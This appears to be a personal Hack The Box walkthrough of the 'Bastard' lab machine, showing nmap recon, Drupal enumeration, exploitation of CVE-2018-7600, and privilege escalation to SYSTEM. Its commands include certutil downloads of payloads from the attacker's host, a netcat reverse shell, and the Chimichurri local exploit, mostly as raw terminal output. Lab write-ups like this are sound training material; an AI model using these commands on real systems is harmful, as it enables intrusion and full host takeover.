bastard
Introduction:
Recon
eneloop@kinetic:…/hackthebox/bastard/data$ sudo nmap -sS -sC -sV -O -T4 -oN nmap.bastard.txt 10.10.10.9 [sudo] password for eneloop: Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-17 23:32 EST Nmap scan report for 10.10.10.9 Host is up (0.016s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 |http-generator: Drupal 7 (http://drupal.org) | http-methods: | Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Microsoft-IIS/7.5 |_http-title: Welcome to 10.10.10.9 | 10.10.10.9 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 72.35 seconds eneloop@kinetic:…/hackthebox/bastard/data$
(py3) eneloop@kinetic:/oscp/tools/drupwn$ ./drupwn –mode enum –target http://bastard.htb
Enumeration
(py3) eneloop@kinetic:/oscp/tools/drupwn$ ./drupwn –mode enum –target http://bastard.htb
____
/ __ \_______ ______ _ ______
/ / / / ___/ / / / __ \ | /| / / __ \
/ /_/ / / / /_/ / /_/ / |/ |/ / / / /
/_____/_/ \__,_/ .___/|__/|__/_/ /_/
/_/
[-] Version not specified, trying to identify it
[+] Version detected: 7.54
eneloop@kinetic:…/lab/hackthebox/bastard$ searchsploit drupal 7
Exploit Title | Path
Drupal < 7.58 - ‘Drupalgeddon3’ (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb Drupal < 7.58 - ‘Drupalgeddon3’ (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - ‘Drupalgeddon2’ Remote Code Execution | php/webapps/44449.rb Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - ‘Drupalgeddon2’ Remote Code Execution | php/webapps/44449.rb
eneloop@kinetic:…/lab/hackthebox/bastard$ searchsploit -x php/webapps/44448.py
https://github.com/pimps/CVE-2018-7600
1(py3) eneloop@kinetic:.../hackthebox/bastard/data$ ./d7-7600.py -c dir http://10.10.10.9/
2
3=============================================================================
4| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
5| by pimps |
6=============================================================================
7
8[*] Poisoning a form and including it in cache.
9[*] Poisoned form ID: form-joAg9mvc4nPpI_TSF2AV3Y2k7p7w_FTPqsfQqwt4pug
10[*] Triggering exploit to execute: dir
11 Volume in drive C has no label.
12 Volume Serial Number is 605B-4AAA
13
14 Directory of C:\inetpub\drupal-7.54
15
1619/03/2017 08:04 �� <DIR> .
1719/03/2017 08:04 �� <DIR> ..
1819/03/2017 12:42 �� 317 .editorconfig
1919/03/2017 12:42 �� 174 .gitignore
2019/03/2017 12:42 �� 5.969 .htaccess
2119/03/2017 12:42 �� 6.604 authorize.php
2219/03/2017 12:42 �� 110.781 CHANGELOG.txt
2319/03/2017 12:42 �� 1.481 COPYRIGHT.txt
2419/03/2017 12:42 �� 720 cron.php
2519/03/2017 12:43 �� <DIR> includes
2619/03/2017 12:42 �� 529 index.php
2719/03/2017 12:42 �� 1.717 INSTALL.mysql.txt
2819/03/2017 12:42 �� 1.874 INSTALL.pgsql.txt
29
Exploitation
(py3) eneloop@kinetic:…/bastard/data/payload$ ./d7-7600.py -c systeminfo http://10.10.10.9/
============================================================================= | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) | | by pimps |
[] Poisoning a form and including it in cache. [] Poisoned form ID: form-XBJEtt8uMYXWEp6aMr3onLyFKeWkyqDt59K7xmKMBmg [*] Triggering exploit to execute: systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 18/1/2021, 3:43:34 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.578 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.609 MB
Virtual Memory: In Use: 486 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
(py3) eneloop@kinetic:…/bastard/data/payload$
(py3) eneloop@kinetic:…/bastard/data/payload$ ./d7-7600.py -c ‘certutil.exe -urlcache -f http://10.10.14.38:8000/rc.php C:\inetpub\drupal-7.54\rc.php’ http://10.10.10.9/
============================================================================= | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) | | by pimps |
[] Poisoning a form and including it in cache. [] Poisoned form ID: form-pV3FfyQrok-v1CUk-ICEzzqRbLalxWf99h6r7LLSp8E [*] Triggering exploit to execute: certutil.exe -urlcache -f http://10.10.14.38:8000/rc.php C:\inetpub\drupal-7.54\rc.php **** Online **** CertUtil: -URLCache command completed successfully.
(py3) eneloop@kinetic:…/bastard/data/payload$ ./d7-7600.py -c ‘certutil.exe -urlcache -f http://10.10.14.38:8000/nc64.exe C:\inetpub\drupal-7.54\nc64.exe’ http://10.10.10.9/
============================================================================= | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) | | by pimps |
[] Poisoning a form and including it in cache. [] Poisoned form ID: form-pYpo_IIutDXVaOTa68N6s8T28gEjTkjH9msl5NxSZo0 [*] Triggering exploit to execute: certutil.exe -urlcache -f http://10.10.14.38:8000/nc64.exe C:\inetpub\drupal-7.54\nc64.exe **** Online **** CertUtil: -URLCache command completed successfully.
(py3) eneloop@kinetic:…/bastard/data/payload$
Post-exploit/PrivEsc
(py2) eneloop@kinetic:…/windows/winexploitsuggest/Windows-Exploit-Suggester$ python ./windows-exploit-suggester.py -i sysinfo.txt –database=2021-01-01-mssb.xls [] initiating winsploit version 3.3… [] database file detected as xls or xlsx based on extension [] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (utf-8) [] querying database file for potential vulnerabilities [] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits [] there are now 197 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [] missing bulletin [+] windows version identified as ‘Windows 2008 R2 64-bit’ [] [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical [M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important [E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical [] http://www.exploit-db.com/exploits/35273/ – Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC [] http://www.exploit-db.com/exploits/34815/ – Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC [] [E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important [M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important [M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical [E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important [E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important [M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical [M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical [] done
(py3) eneloop@kinetic:…/bastard/data/payload$ ./d7-7600.py -c ‘C:\inetpub\drupal-7.54\nc64.exe -e cmd 10.10.14.38 4455’ http://10.10.10.9/
============================================================================= | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) | | by pimps |
[] Poisoning a form and including it in cache. [] Poisoned form ID: form-1JaW43i4wwmvAouc8TMG5C-VS6knLY1PSlWTgq6GJ24 [*] Triggering exploit to execute: C:\inetpub\drupal-7.54\nc64.exe -e cmd 10.10.14.38 4455
(py3) eneloop@kinetic:…/bastard/data/payload$ ./d7-7600.py -c ‘certutil.exe -urlcache -f http://10.10.14.38:8000/MS10-059.exe C:\inetpub\drupal-7.54\MS10-059.exe’ http://10.10.10.9/
============================================================================= | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) | | by pimps |
[] Poisoning a form and including it in cache. [] Poisoned form ID: form-tAHqATaJdeObhIWwMTdAqVjJNc9ajURigKGtKGurlSw [*] Triggering exploit to execute: certutil.exe -urlcache -f http://10.10.14.38:8000/MS10-059.exe C:\inetpub\drupal-7.54\MS10-059.exe **** Online **** CertUtil: -URLCache command completed successfully.
(py3) eneloop@kinetic:…/bastard/data/payload$
$ nc -lvnp 7859 listening on [any] 7859 …
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr
C:\inetpub\drupal-7.54>MS10-059.exe
MS10-059.exe
/Chimichurri/–>This exploit gives you a Local System shell
/Chimichurri/–>Usage: Chimichurri.exe ipaddress port
C:\inetpub\drupal-7.54>MS10-059.exe 10.10.14.38 7859
MS10-059.exe 10.10.14.38 7859
/Chimichurri/–>This exploit gives you a Local System shell
/Chimichurri/–>Changing registry values…
/Chimichurri/–>Got SYSTEM token…
/Chimichurri/–>Running reverse shell…
/Chimichurri/–>Restoring default registry values…
C:\inetpub\drupal-7.54>whoami whoami nt authority\system
C:\inetpub\drupal-7.54>cd ../.. cd ../..
C:>dir dir Volume in drive C has no label. Volume Serial Number is 605B-4AAA
Directory of C:\
07/11/2007 08:00 �� 17.734 eula.1028.txt 07/11/2007 08:00 �� 17.734 eula.1031.txt 07/11/2007 08:00 �� 10.134 eula.1033.txt 07/11/2007 08:00 �� 17.734 eula.1036.txt 07/11/2007 08:00 �� 17.734 eula.1040.txt 07/11/2007 08:00 �� 118 eula.1041.txt 07/11/2007 08:00 �� 17.734 eula.1042.txt 07/11/2007 08:00 �� 17.734 eula.2052.txt 07/11/2007 08:00 �� 17.734 eula.3082.txt 07/11/2007 08:00 �� 1.110 globdata.ini 19/03/2017 12:43 ��
C:>cd Users cd Users
C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is 605B-4AAA
Directory of C:\Users
19/03/2017 07:35 ��
C:\Users>cd dmitris cd dmitris The system cannot find the path specified.
C:\Users>cd dimitris cd dimitris
C:\Users\dimitris>cd Desktop cd Desktop
C:\Users\dimitris\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 605B-4AAA
Directory of C:\Users\dimitris\Desktop
19/03/2017 08:04 ��
C:\Users\dimitris\Desktop>cat user.txt cat user.txt ‘cat’ is not recognized as an internal or external command, operable program or batch file.
C:\Users\dimitris\Desktop>type user.txt type user.txt baXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXa2 C:\Users\dimitris\Desktop>cd ../.. cd ../..
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users
19/03/2017 07:35 ��
C:\Users>cd Administrator cd Administrator
C:\Users\Administrator>dir dir Volume in drive C has no label. Volume Serial Number is 605B-4AAA
Directory of C:\Users\Administrator
19/03/2017 01:20 ��
C:\Users\Administrator>cd Desktop cd Desktop
C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 605B-4AAA
Directory of C:\Users\Administrator\Desktop
19/03/2017 07:33 ��
C:\Users\Administrator\Desktop>type root.txt.txt type root.txt.txt 4bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX7c C:\Users\Administrator\Desktop>^[t(py2)
Notes: